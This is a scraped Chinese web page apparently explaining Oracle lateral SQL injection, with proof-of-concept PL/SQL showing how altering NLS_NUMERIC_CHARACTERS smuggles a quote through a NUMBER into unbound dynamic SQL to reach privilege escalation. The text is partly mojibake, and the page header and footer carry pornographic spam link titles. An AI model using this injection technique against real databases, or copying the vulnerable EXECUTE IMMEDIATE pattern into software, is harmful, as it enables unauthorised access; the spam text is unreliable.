麻豆小视频在线观看_中文黄色一级片_久久久成人精品_成片免费观看视频大全_午夜精品久久久久久久99热浪潮_成人一区二区三区四区

首頁 > 數(shù)據(jù)庫 > Oracle > 正文

ORACLE LATERAL-SQL-INJECTION 個(gè)人見解

2024-08-29 13:56:35
字體:
供稿:網(wǎng)友
如果直接執(zhí)行SQL語句或者參數(shù)綁定則不用擔(dān)心太多,
如以下ORACLE存儲(chǔ)過程
create or replace procedure kjdatepoc(date d)

as

begin

insert into kjdatetable values(d);

commit;

end;

根本不需要擔(dān)心遭受到SQL新型注入攻擊,那么在什么地方會(huì)發(fā)生DATE 以及 NUMBER的注入攻擊呢???一般都是采用了動(dòng)態(tài)SQL而又不采用參數(shù)綁定的語句。

例如工程師經(jīng)常用的DBMS_SQL或者EXECUTE IMMEDIATE

看以下存儲(chǔ)過程

create or replace procedure kjdatepoc(date d)

as

begin

execute immediate ‘insert into kjdatetable values('|| d ||')';

commit;

end;

那么遇到以上的存儲(chǔ)過程或者函數(shù)等,也通過修改SESSION中的NLS_DATE_FORMAT中的值達(dá)到SQL注射的目的,

老外的PAPER講解得非常詳細(xì)了 ,我在這里也不廢話。

惟獨(dú)對(duì)于 NUMBER類型的注射沒有多作講解 只是簡單演示了可以輸出單引號(hào)!

看以下語句

ALTER SESSION SET NLS_NUMERIC_CHARACTERS=”'.';

SELECT to_number(1000.10001,'999999D99999′)||” FROM DUAL;

輸出一下結(jié)果

1000′10001

只是多了一個(gè)單引號(hào),那有什么用呢?樂觀的來說!在特定情況下是很有價(jià)值的!看以下一個(gè)存儲(chǔ)過程

create or replace procedure NumInjPoc(kjexpnum number,kjexpstr varchar2)

is

SecStr varchar2(1000);

begin

SecStr:=replace(kjexpstr,””,”””);

sys.dbms_output.put_line('SELECT * FROM DUAL WHERE and name=”'||SecStr||””);

end;

內(nèi)部對(duì)varchar類型進(jìn)行替換了!我們可以進(jìn)行測(cè)試

begin

numinjpoc(1000,”'–');

end;

其輸出SQL語句為

SELECT * FROM DUAL WHERE ID=1000 and name=”'–'

單引號(hào)被轉(zhuǎn)義掉了

那么如果我們結(jié)合這個(gè)NUMBER類型怎么進(jìn)行注射呢?

ALTER SESSION SET NLS_NUMERIC_CHARACTERS=”'.';

begin

numinjpoc(TO_NUMBER(0.10001,'999999D99999′),'||kj.exp()–');

end;

看看輸出結(jié)果

SELECT * FROM DUAL WHERE||kj.exp()–'

這樣就可以間接的攻擊它…

在某中程度才來需要ALTER SESSION 配合后,再去攻擊系統(tǒng)內(nèi)部的一些函數(shù)或者過程來提升權(quán)限。未嘗不是一種好的突破思路,但是對(duì)于單語句進(jìn)行SQL注射攻擊,以結(jié)果為向?qū)У脑?!這樣的方式?jīng)]多大作為。
發(fā)表評(píng)論 共有條評(píng)論
用戶名: 密碼:
驗(yàn)證碼: 匿名發(fā)表
主站蜘蛛池模板: 国产精品亚洲欧美一级在线 | 久久久噜噜噜久久熟有声小说 | 91麻豆精品国产91久久久更新资源速度超快 | 越南一级黄色片 | 国产噜噜噜噜噜久久久久久久久 | 爱射av | 婷婷亚洲一区二区三区 | 99影视电影电视剧在线播放 | 国产精品免费久久久久久 | 日本黄色一级毛片 | 欧美人与禽性xxxxx杂性 | 精品伊人| 久久电影一区二区 | 国产毛片毛片 | 天堂成人国产精品一区 | 黄色毛片免费看 | 久久国产成人精品国产成人亚洲 | 欧美日韩一区,二区,三区,久久精品 | 久久草在线观看视频 | 成人做爰高潮片免费视频韩国 | 国产精品一区网站 | 日韩视频在线观看免费视频 | 一级黄色性感片 | 国产精品久久久乱弄 | 免费久久久| 91在线色| 国产亚洲精品久久久久久久软件 | 国内成人自拍视频 | 9797色| 8x成人在线电影 | 日本aaaa片毛片免费观看视频 | 黄色免费在线网址 | 欧美14一15sex性hd | 好吊色欧美一区二区三区四区 | 在线免费视频a | 久久久国产精品网站 | 免费日本一区二区 | 国产女同疯狂激烈互摸 | 成人 在线| 国产精品久久77777 | 日日草夜夜草 |